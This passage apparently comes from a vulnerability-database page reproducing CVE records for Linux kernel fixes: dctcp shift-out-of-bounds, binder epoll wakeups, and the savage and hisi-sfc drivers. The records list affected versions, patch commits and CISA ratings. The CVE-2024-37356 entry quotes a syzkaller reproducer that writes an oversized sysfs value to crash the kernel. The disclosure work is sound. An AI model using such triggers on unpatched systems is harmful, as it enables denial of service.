"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nfbdev: savage: Error out if pixclock equals zero\n\nThe userspace program could pass any values to the driver through\nioctl() interface. If the driver doesn\u0027t check the value of pixclock,\nit may cause divide-by-zero error.\n\nAlthough pixclock is checked in savagefb_decode_var(), but it is not\nchecked properly in savagefb_probe(). Fix this by checking whether\npixclock is zero in the function savagefb_check_var() before\ninfo-\u003evar.pixclock is used as the divisor.\n\nThis is similar to CVE-2022-3061 in i740fb which was fixed by\ncommit 15cf0b8."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:56:17.963Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/224453de8505aede1890f007be973925a3edf6a1"
},
{
"url": "https://git.kernel.org/stable/c/84dce0f6a4cc5b7bfd7242ef9290db8ac1dd77ff"
},
{
"url": "https://git.kernel.org/stable/c/512ee6d6041e007ef5bf200c6e388e172a2c5b24"
},
{
"url": "https://git.kernel.org/stable/c/8c54acf33e5adaad6374bf3ec1e3aff0591cc8e1"
},
{
"url": "https://git.kernel.org/stable/c/070398d32c5f3ab0e890374904ad94551c76aec4"
},
{
"url": "https://git.kernel.org/stable/c/bc3c2e58d73b28b9a8789fca84778ee165a72d13"
},
{
"url": "https://git.kernel.org/stable/c/a9ca4e80d23474f90841251f4ac0d941fa337a01"
},
{
"url": "https://git.kernel.org/stable/c/04e5eac8f3ab2ff52fa191c187a46d4fdbc1e288"
}
],
"title": "fbdev: savage: Error out if pixclock equals zero",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26778",
"datePublished": "2024-04-03T17:01:08.782Z",
"dateReserved": "2024-02-19T14:20:24.177Z",
"dateUpdated": "2025-05-04T08:56:17.963Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-37356 (GCVE-0-2024-37356)
Vulnerability from cvelistv5
Published
2024-06-21 10:18
Modified
2025-11-04 17:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
tcp: Fix shift-out-of-bounds in dctcp_update_alpha().
In dctcp_update_alpha(), we use a module parameter dctcp_shift_g
as follows:
alpha -= min_not_zero(alpha, alpha >> dctcp_shift_g);
...
delivered_ce <<= (10 - dctcp_shift_g);
It seems syzkaller started fuzzing module parameters and triggered
shift-out-of-bounds [0] by setting 100 to dctcp_shift_g:
memcpy((void*)0x20000080,
"/sys/module/tcp_dctcp/parameters/dctcp_shift_g\000", 47);
res = syscall(__NR_openat, /*fd=*/0xffffffffffffff9cul, /*file=*/0x20000080ul,
/*flags=*/2ul, /*mode=*/0ul);
memcpy((void*)0x20000000, "100\000", 4);
syscall(__NR_write, /*fd=*/r[0], /*val=*/0x20000000ul, /*len=*/4ul);
Let's limit the max value of dctcp_shift_g by param_set_uint_minmax().
With this patch:
# echo 10 > /sys/module/tcp_dctcp/parameters/dctcp_shift_g
# cat /sys/module/tcp_dctcp/parameters/dctcp_shift_g
10
# echo 11 > /sys/module/tcp_dctcp/parameters/dctcp_shift_g
-bash: echo: write error: Invalid argument
[0]:
UBSAN: shift-out-of-bounds in net/ipv4/tcp_dctcp.c:143:12
shift exponent 100 is too large for 32-bit type 'u32' (aka 'unsigned int')
CPU: 0 PID: 8083 Comm: syz-executor345 Not tainted 6.9.0-05151-g1b294a1f3561 #2
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
1.13.0-1ubuntu1.1 04/01/2014
Call Trace:
<TASK>
__dump_stack lib/dump_stack.c:88 [inline]
dump_stack_lvl+0x201/0x300 lib/dump_stack.c:114
ubsan_epilogue lib/ubsan.c:231 [inline]
__ubsan_handle_shift_out_of_bounds+0x346/0x3a0 lib/ubsan.c:468
dctcp_update_alpha+0x540/0x570 net/ipv4/tcp_dctcp.c:143
tcp_in_ack_event net/ipv4/tcp_input.c:3802 [inline]
tcp_ack+0x17b1/0x3bc0 net/ipv4/tcp_input.c:3948
tcp_rcv_state_process+0x57a/0x2290 net/ipv4/tcp_input.c:6711
tcp_v4_do_rcv+0x764/0xc40 net/ipv4/tcp_ipv4.c:1937
sk_backlog_rcv include/net/sock.h:1106 [inline]
__release_sock+0x20f/0x350 net/core/sock.c:2983
release_sock+0x61/0x1f0 net/core/sock.c:3549
mptcp_subflow_shutdown+0x3d0/0x620 net/mptcp/protocol.c:2907
mptcp_check_send_data_fin+0x225/0x410 net/mptcp/protocol.c:2976
__mptcp_close+0x238/0xad0 net/mptcp/protocol.c:3072
mptcp_close+0x2a/0x1a0 net/mptcp/protocol.c:3127
inet_release+0x190/0x1f0 net/ipv4/af_inet.c:437
__sock_release net/socket.c:659 [inline]
sock_close+0xc0/0x240 net/socket.c:1421
__fput+0x41b/0x890 fs/file_table.c:422
task_work_run+0x23b/0x300 kernel/task_work.c:180
exit_task_work include/linux/task_work.h:38 [inline]
do_exit+0x9c8/0x2540 kernel/exit.c:878
do_group_exit+0x201/0x2b0 kernel/exit.c:1027
__do_sys_exit_group kernel/exit.c:1038 [inline]
__se_sys_exit_group kernel/exit.c:1036 [inline]
__x64_sys_exit_group+0x3f/0x40 kernel/exit.c:1036
do_syscall_x64 arch/x86/entry/common.c:52 [inline]
do_syscall_64+0xe4/0x240 arch/x86/entry/common.c:83
entry_SYSCALL_64_after_hwframe+0x67/0x6f
RIP: 0033:0x7f6c2b5005b6
Code: Unable to access opcode bytes at 0x7f6c2b50058c.
RSP: 002b:00007ffe883eb948 EFLAGS: 00000246 ORIG_RAX: 00000000000000e7
RAX: ffffffffffffffda RBX: 00007f6c2b5862f0 RCX: 00007f6c2b5005b6
RDX: 0000000000000001 RSI: 000000000000003c RDI: 0000000000000001
RBP: 0000000000000001 R08: 00000000000000e7 R09: ffffffffffffffc0
R10: 0000000000000006 R11: 0000000000000246 R12: 00007f6c2b5862f0
R13: 0000000000000001 R14: 0000000000000000 R15: 0000000000000001
</TASK>
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: e3118e8359bb7c59555aca60c725106e6d78c5ce Version: e3118e8359bb7c59555aca60c725106e6d78c5ce Version: e3118e8359bb7c59555aca60c725106e6d78c5ce Version: e3118e8359bb7c59555aca60c725106e6d78c5ce Version: e3118e8359bb7c59555aca60c725106e6d78c5ce Version: e3118e8359bb7c59555aca60c725106e6d78c5ce Version: e3118e8359bb7c59555aca60c725106e6d78c5ce Version: e3118e8359bb7c59555aca60c725106e6d78c5ce |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-37356",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-21T13:56:45.436880Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-21T13:57:55.391Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:21:20.246Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/06d0fe049b51b0a92a70df8333fd85c4ba3eb2c6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6aacaa80d962f4916ccf90e2080306cec6c90fcf"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e9b2f60636d18dfd0dd4965b3316f88dfd6a2b31"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8602150286a2a860a1dc55cbd04f99316f19b40a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e65d13ec00a738fa7661925fd5929ab3c765d4be"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/02261d3f9dc7d1d7be7d778f839e3404ab99034c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/237340dee373b97833a491d2e99fcf1d4a9adafd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3ebc46ca8675de6378e3f8f40768e180bb8afa66"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ipv4/tcp_dctcp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "06d0fe049b51b0a92a70df8333fd85c4ba3eb2c6",
"status": "affected",
"version": "e3118e8359bb7c59555aca60c725106e6d78c5ce",
"versionType": "git"
},
{
"lessThan": "6aacaa80d962f4916ccf90e2080306cec6c90fcf",
"status": "affected",
"version": "e3118e8359bb7c59555aca60c725106e6d78c5ce",
"versionType": "git"
},
{
"lessThan": "e9b2f60636d18dfd0dd4965b3316f88dfd6a2b31",
"status": "affected",
"version": "e3118e8359bb7c59555aca60c725106e6d78c5ce",
"versionType": "git"
},
{
"lessThan": "8602150286a2a860a1dc55cbd04f99316f19b40a",
"status": "affected",
"version": "e3118e8359bb7c59555aca60c725106e6d78c5ce",
"versionType": "git"
},
{
"lessThan": "e65d13ec00a738fa7661925fd5929ab3c765d4be",
"status": "affected",
"version": "e3118e8359bb7c59555aca60c725106e6d78c5ce",
"versionType": "git"
},
{
"lessThan": "02261d3f9dc7d1d7be7d778f839e3404ab99034c",
"status": "affected",
"version": "e3118e8359bb7c59555aca60c725106e6d78c5ce",
"versionType": "git"
},
{
"lessThan": "237340dee373b97833a491d2e99fcf1d4a9adafd",
"status": "affected",
"version": "e3118e8359bb7c59555aca60c725106e6d78c5ce",
"versionType": "git"
},
{
"lessThan": "3ebc46ca8675de6378e3f8f40768e180bb8afa66",
"status": "affected",
"version": "e3118e8359bb7c59555aca60c725106e6d78c5ce",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ipv4/tcp_dctcp.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.18"
},
{
"lessThan": "3.18",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.316",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.278",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.219",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.161",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.93",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.33",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.316",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.278",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.219",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.161",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.4",
"versionStartIncluding": "3.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "3.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp: Fix shift-out-of-bounds in dctcp_update_alpha().\n\nIn dctcp_update_alpha(), we use a module parameter dctcp_shift_g\nas follows:\n\n alpha -= min_not_zero(alpha, alpha \u003e\u003e dctcp_shift_g);\n ...\n delivered_ce \u003c\u003c= (10 - dctcp_shift_g);\n\nIt seems syzkaller started fuzzing module parameters and triggered\nshift-out-of-bounds [0] by setting 100 to dctcp_shift_g:\n\n memcpy((void*)0x20000080,\n \"/sys/module/tcp_dctcp/parameters/dctcp_shift_g\\000\", 47);\n res = syscall(__NR_openat, /*fd=*/0xffffffffffffff9cul, /*file=*/0x20000080ul,\n /*flags=*/2ul, /*mode=*/0ul);\n memcpy((void*)0x20000000, \"100\\000\", 4);\n syscall(__NR_write, /*fd=*/r[0], /*val=*/0x20000000ul, /*len=*/4ul);\n\nLet\u0027s limit the max value of dctcp_shift_g by param_set_uint_minmax().\n\nWith this patch:\n\n # echo 10 \u003e /sys/module/tcp_dctcp/parameters/dctcp_shift_g\n # cat /sys/module/tcp_dctcp/parameters/dctcp_shift_g\n 10\n # echo 11 \u003e /sys/module/tcp_dctcp/parameters/dctcp_shift_g\n -bash: echo: write error: Invalid argument\n\n[0]:\nUBSAN: shift-out-of-bounds in net/ipv4/tcp_dctcp.c:143:12\nshift exponent 100 is too large for 32-bit type \u0027u32\u0027 (aka \u0027unsigned int\u0027)\nCPU: 0 PID: 8083 Comm: syz-executor345 Not tainted 6.9.0-05151-g1b294a1f3561 #2\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS\n1.13.0-1ubuntu1.1 04/01/2014\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0x201/0x300 lib/dump_stack.c:114\n ubsan_epilogue lib/ubsan.c:231 [inline]\n __ubsan_handle_shift_out_of_bounds+0x346/0x3a0 lib/ubsan.c:468\n dctcp_update_alpha+0x540/0x570 net/ipv4/tcp_dctcp.c:143\n tcp_in_ack_event net/ipv4/tcp_input.c:3802 [inline]\n tcp_ack+0x17b1/0x3bc0 net/ipv4/tcp_input.c:3948\n tcp_rcv_state_process+0x57a/0x2290 net/ipv4/tcp_input.c:6711\n tcp_v4_do_rcv+0x764/0xc40 net/ipv4/tcp_ipv4.c:1937\n sk_backlog_rcv include/net/sock.h:1106 [inline]\n __release_sock+0x20f/0x350 net/core/sock.c:2983\n release_sock+0x61/0x1f0 net/core/sock.c:3549\n mptcp_subflow_shutdown+0x3d0/0x620 net/mptcp/protocol.c:2907\n mptcp_check_send_data_fin+0x225/0x410 net/mptcp/protocol.c:2976\n __mptcp_close+0x238/0xad0 net/mptcp/protocol.c:3072\n mptcp_close+0x2a/0x1a0 net/mptcp/protocol.c:3127\n inet_release+0x190/0x1f0 net/ipv4/af_inet.c:437\n __sock_release net/socket.c:659 [inline]\n sock_close+0xc0/0x240 net/socket.c:1421\n __fput+0x41b/0x890 fs/file_table.c:422\n task_work_run+0x23b/0x300 kernel/task_work.c:180\n exit_task_work include/linux/task_work.h:38 [inline]\n do_exit+0x9c8/0x2540 kernel/exit.c:878\n do_group_exit+0x201/0x2b0 kernel/exit.c:1027\n __do_sys_exit_group kernel/exit.c:1038 [inline]\n __se_sys_exit_group kernel/exit.c:1036 [inline]\n __x64_sys_exit_group+0x3f/0x40 kernel/exit.c:1036\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0xe4/0x240 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x67/0x6f\nRIP: 0033:0x7f6c2b5005b6\nCode: Unable to access opcode bytes at 0x7f6c2b50058c.\nRSP: 002b:00007ffe883eb948 EFLAGS: 00000246 ORIG_RAX: 00000000000000e7\nRAX: ffffffffffffffda RBX: 00007f6c2b5862f0 RCX: 00007f6c2b5005b6\nRDX: 0000000000000001 RSI: 000000000000003c RDI: 0000000000000001\nRBP: 0000000000000001 R08: 00000000000000e7 R09: ffffffffffffffc0\nR10: 0000000000000006 R11: 0000000000000246 R12: 00007f6c2b5862f0\nR13: 0000000000000001 R14: 0000000000000000 R15: 0000000000000001\n \u003c/TASK\u003e"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:13:22.548Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/06d0fe049b51b0a92a70df8333fd85c4ba3eb2c6"
},
{
"url": "https://git.kernel.org/stable/c/6aacaa80d962f4916ccf90e2080306cec6c90fcf"
},
{
"url": "https://git.kernel.org/stable/c/e9b2f60636d18dfd0dd4965b3316f88dfd6a2b31"
},
{
"url": "https://git.kernel.org/stable/c/8602150286a2a860a1dc55cbd04f99316f19b40a"
},
{
"url": "https://git.kernel.org/stable/c/e65d13ec00a738fa7661925fd5929ab3c765d4be"
},
{
"url": "https://git.kernel.org/stable/c/02261d3f9dc7d1d7be7d778f839e3404ab99034c"
},
{
"url": "https://git.kernel.org/stable/c/237340dee373b97833a491d2e99fcf1d4a9adafd"
},
{
"url": "https://git.kernel.org/stable/c/3ebc46ca8675de6378e3f8f40768e180bb8afa66"
}
],
"title": "tcp: Fix shift-out-of-bounds in dctcp_update_alpha().",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-37356",
"datePublished": "2024-06-21T10:18:11.642Z",
"dateReserved": "2024-06-21T10:13:16.306Z",
"dateUpdated": "2025-11-04T17:21:20.246Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-26606 (GCVE-0-2024-26606)
Vulnerability from cvelistv5
Published
2024-02-26 14:39
Modified
2025-11-04 18:29
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
binder: signal epoll threads of self-work
In (e)poll mode, threads often depend on I/O events to determine when
data is ready for consumption. Within binder, a thread may initiate a
command via BINDER_WRITE_READ without a read buffer and then make use
of epoll_wait() or similar to consume any responses afterwards.
It is then crucial that epoll threads are signaled via wakeup when they
queue their own work. Otherwise, they risk waiting indefinitely for an
event leaving their work unhandled. What is worse, subsequent commands
won't trigger a wakeup either as the thread has pending work.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 457b9a6f09f011ebcb9b52cc203a6331a6fc2de7 Version: 457b9a6f09f011ebcb9b52cc203a6331a6fc2de7 Version: 457b9a6f09f011ebcb9b52cc203a6331a6fc2de7 Version: 457b9a6f09f011ebcb9b52cc203a6331a6fc2de7 Version: 457b9a6f09f011ebcb9b52cc203a6331a6fc2de7 Version: 457b9a6f09f011ebcb9b52cc203a6331a6fc2de7 Version: 457b9a6f09f011ebcb9b52cc203a6331a6fc2de7 Version: 457b9a6f09f011ebcb9b52cc203a6331a6fc2de7 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26606",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-28T17:03:56.068498Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-28T17:03:58.774Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T18:29:53.507Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dd64bb8329ce0ea27bc557e4160c2688835402ac"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/42beab162dcee1e691ee4934292d51581c29df61"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a423042052ec2bdbf1e552e621e6a768922363cc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/82722b453dc2f967b172603e389ee7dc1b3137cc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/90e09c016d72b91e76de25f71c7b93d94cc3c769"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a7ae586f6f6024f490b8546c8c84670f96bb9b68"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/93b372c39c40cbf179e56621e6bc48240943af69"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/97830f3c3088638ff90b20dfba2eb4d487bf14d7"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZOU3745CWCDZ7EMKMXB2OEEIB5Q3IWM/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/android/binder.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "dd64bb8329ce0ea27bc557e4160c2688835402ac",
"status": "affected",
"version": "457b9a6f09f011ebcb9b52cc203a6331a6fc2de7",
"versionType": "git"
},
{
"lessThan": "42beab162dcee1e691ee4934292d51581c29df61",
"status": "affected",
"version": "457b9a6f09f011ebcb9b52cc203a6331a6fc2de7",
"versionType": "git"
},
{
"lessThan": "a423042052ec2bdbf1e552e621e6a768922363cc",
"status": "affected",
"version": "457b9a6f09f011ebcb9b52cc203a6331a6fc2de7",
"versionType": "git"
},
{
"lessThan": "82722b453dc2f967b172603e389ee7dc1b3137cc",
"status": "affected",
"version": "457b9a6f09f011ebcb9b52cc203a6331a6fc2de7",
"versionType": "git"
},
{
"lessThan": "90e09c016d72b91e76de25f71c7b93d94cc3c769",
"status": "affected",
"version": "457b9a6f09f011ebcb9b52cc203a6331a6fc2de7",
"versionType": "git"
},
{
"lessThan": "a7ae586f6f6024f490b8546c8c84670f96bb9b68",
"status": "affected",
"version": "457b9a6f09f011ebcb9b52cc203a6331a6fc2de7",
"versionType": "git"
},
{
"lessThan": "93b372c39c40cbf179e56621e6bc48240943af69",
"status": "affected",
"version": "457b9a6f09f011ebcb9b52cc203a6331a6fc2de7",
"versionType": "git"
},
{
"lessThan": "97830f3c3088638ff90b20dfba2eb4d487bf14d7",
"status": "affected",
"version": "457b9a6f09f011ebcb9b52cc203a6331a6fc2de7",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/android/binder.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.29"
},
{
"lessThan": "2.6.29",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.79",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.18",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"versionStartIncluding": "2.6.29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "2.6.29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "2.6.29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "2.6.29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.79",
"versionStartIncluding": "2.6.29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.18",
"versionStartIncluding": "2.6.29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.6",
"versionStartIncluding": "2.6.29",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "2.6.29",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbinder: signal epoll threads of self-work\n\nIn (e)poll mode, threads often depend on I/O events to determine when\ndata is ready for consumption. Within binder, a thread may initiate a\ncommand via BINDER_WRITE_READ without a read buffer and then make use\nof epoll_wait() or similar to consume any responses afterwards.\n\nIt is then crucial that epoll threads are signaled via wakeup when they\nqueue their own work. Otherwise, they risk waiting indefinitely for an\nevent leaving their work unhandled. What is worse, subsequent commands\nwon\u0027t trigger a wakeup either as the thread has pending work."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:52:12.161Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/dd64bb8329ce0ea27bc557e4160c2688835402ac"
},
{
"url": "https://git.kernel.org/stable/c/42beab162dcee1e691ee4934292d51581c29df61"
},
{
"url": "https://git.kernel.org/stable/c/a423042052ec2bdbf1e552e621e6a768922363cc"
},
{
"url": "https://git.kernel.org/stable/c/82722b453dc2f967b172603e389ee7dc1b3137cc"
},
{
"url": "https://git.kernel.org/stable/c/90e09c016d72b91e76de25f71c7b93d94cc3c769"
},
{
"url": "https://git.kernel.org/stable/c/a7ae586f6f6024f490b8546c8c84670f96bb9b68"
},
{
"url": "https://git.kernel.org/stable/c/93b372c39c40cbf179e56621e6bc48240943af69"
},
{
"url": "https://git.kernel.org/stable/c/97830f3c3088638ff90b20dfba2eb4d487bf14d7"
}
],
"title": "binder: signal epoll threads of self-work",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26606",
"datePublished": "2024-02-26T14:39:15.861Z",
"dateReserved": "2024-02-19T14:20:24.130Z",
"dateUpdated": "2025-11-04T18:29:53.507Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-26776 (GCVE-0-2024-26776)
Vulnerability from cvelistv5
Published
2024-04-03 17:01
Modified
2025-05-21 09:12
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
spi: hisi-sfc-v3xx: Return IRQ_NONE if no interrupts were detected
Return IRQ_NONE from the interrupt handler when no interrupt was
detected. Because an empty interrupt will cause a null pointer error:
Unable to handle kernel NULL pointer dereference at virtual
address 0000000000000008
Call trace:
complete+0x54/0x100
